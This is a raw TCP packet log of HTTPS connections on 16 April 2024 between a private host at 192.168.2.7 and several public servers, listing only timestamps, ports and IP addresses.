Apr 16, 2024 11:44:00.539028883 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.539345026 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.540472031 CEST	49708	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:44:00.540545940 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.540627956 CEST	49708	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:44:00.542871952 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.543165922 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.543191910 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.544848919 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.544912100 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.545732021 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.545820951 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.546056986 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.546063900 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.584117889 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.585746050 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.643711090 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.644121885 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.644133091 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.645651102 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.645708084 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.647644997 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.647731066 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.648247957 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.648262978 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.695754051 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.696124077 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.696558952 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.697789907 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.697841883 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.703322887 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.710222006 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.710228920 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.711962938 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.712053061 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.720859051 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.720866919 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.720902920 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.720902920 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.720910072 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.721103907 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.721136093 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.721142054 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.721246004 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.721252918 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.721334934 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.721342087 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.722332954 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:00.722563028 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.722587109 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:00.724257946 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:00.724315882 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.724637985 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.724693060 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.724787951 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.724791050 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.724940062 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.725028992 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.725235939 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.725236893 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.726445913 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.726542950 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:00.727118969 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.727302074 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.728486061 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.728677988 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.728893995 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.729091883 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.729199886 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.729213953 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.729222059 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:00.729320049 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.729326963 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.729394913 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.729526997 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.729533911 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.729582071 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.729588032 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.729752064 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.729758978 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.766165972 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.769643068 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.769685984 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.785598993 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.785598993 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.785639048 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.800159931 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800292015 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800340891 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.800350904 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800424099 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800507069 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.800513983 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800609112 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800678968 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.800684929 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800767899 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800852060 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800899982 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.800909042 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.800956964 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.800961971 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801043034 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801098108 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.801105022 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801209927 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801253080 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.801259995 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801497936 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801548958 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.801556110 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801636934 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801721096 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801724911 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.801752090 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.801800013 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.802407026 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.802556038 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.802601099 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.802608967 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.802704096 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.802747965 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.802755117 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.803020000 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.803077936 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.803086042 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.803271055 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.803354025 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.803361893 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.803378105 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.803422928 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.803457022 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.804045916 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.804116011 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.804122925 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.804241896 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.804275036 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.804300070 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.804306984 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.804356098 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.804371119 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.804385900 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.804559946 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.804661036 CEST	49708	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:44:00.805111885 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.805144072 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.805177927 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.805196047 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.805206060 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.805248022 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.805254936 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.805306911 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.805949926 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.806063890 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.817548990 CEST	49708	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:44:00.817557096 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.847573996 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847646952 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847659111 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847707033 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847716093 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847723961 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847740889 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.847740889 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.847749949 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847758055 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847778082 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.847784996 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847815037 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.847834110 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.847857952 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.847944975 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.871586084 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.871597052 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.899599075 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.899758101 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.899905920 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.899972916 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.899972916 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.902226925 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.902431965 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.902967930 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.903052092 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.903112888 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.903305054 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.903450966 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.903635979 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.903713942 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.903789043 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.903989077 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.904283047 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.904320002 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.904373884 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.904381990 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.904405117 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.904422045 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.905240059 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.905311108 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.905325890 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.905392885 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.905668020 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.905730009 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.906502962 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.906562090 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.906596899 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.906661034 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.906694889 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.906748056 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.907440901 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.907510996 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.907526016 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.907589912 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.908402920 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.908466101 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.908488035 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.908543110 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.908577919 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.908627033 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.908632994 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.908719063 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.908767939 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.968440056 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.968473911 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.985507011 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.985519886 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.986804962 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.986814022 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.987531900 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.987535954 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.988070965 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.988075972 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.988404989 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.988409996 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.004535913 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.004568100 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.004735947 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.004914045 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.004928112 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.142399073 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.142431021 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.142518997 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.142803907 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.142848015 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.142931938 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143013000 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143084049 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.143148899 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143363953 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143448114 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.143517971 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143533945 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143551111 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.143671989 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.143686056 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.143721104 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143780947 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.143795967 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.144027948 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.144063950 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.144151926 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.144166946 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.144311905 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.144330978 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.194730997 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:01.194905043 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:01.194958925 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:01.196597099 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:01.196610928 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:01.210397005 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 16, 2024 11:44:01.216835976 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.217056036 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.217063904 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.217350006 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.217627048 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.217690945 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.217734098 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.264120102 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.270915985 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.308576107 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.308605909 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.308722973 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.308898926 CEST	49725	443	192.168.2.7	13.107.213.41
Apr 16, 2024 11:44:01.308914900 CEST	443	49725	13.107.213.41	192.168.2.7
Apr 16, 2024 11:44:01.463037968 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.464752913 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.464797974 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.466491938 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.466583014 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.467998028 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.468621016 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.468753099 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.469078064 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.470747948 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.470854044 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.470983982 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.470993996 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.471084118 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.471107960 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.471343040 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.471357107 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.471410990 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.471437931 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.471764088 CEST	49722	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.471785069 CEST	443	49722	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.472476006 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.472533941 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.472563028 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.472621918 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.472800970 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.472882986 CEST	443	49723	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.472940922 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.472940922 CEST	49723	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.473398924 CEST	49720	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:01.473478079 CEST	443	49720	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:01.473824024 CEST	49721	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.473905087 CEST	443	49721	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.474170923 CEST	49724	443	192.168.2.7	13.107.246.41
Apr 16, 2024 11:44:01.474252939 CEST	443	49724	13.107.246.41	192.168.2.7
Apr 16, 2024 11:44:01.476594925 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.476641893 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.476671934 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.476701021 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.476728916 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.476731062 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.476742029 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.476763964 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.476783037 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.476789951 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477092028 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477121115 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477142096 CEST	49719	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:01.477149963 CEST	443	49719	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:01.477417946 CEST	49719	443	192.168.2.7	104.17.24.14
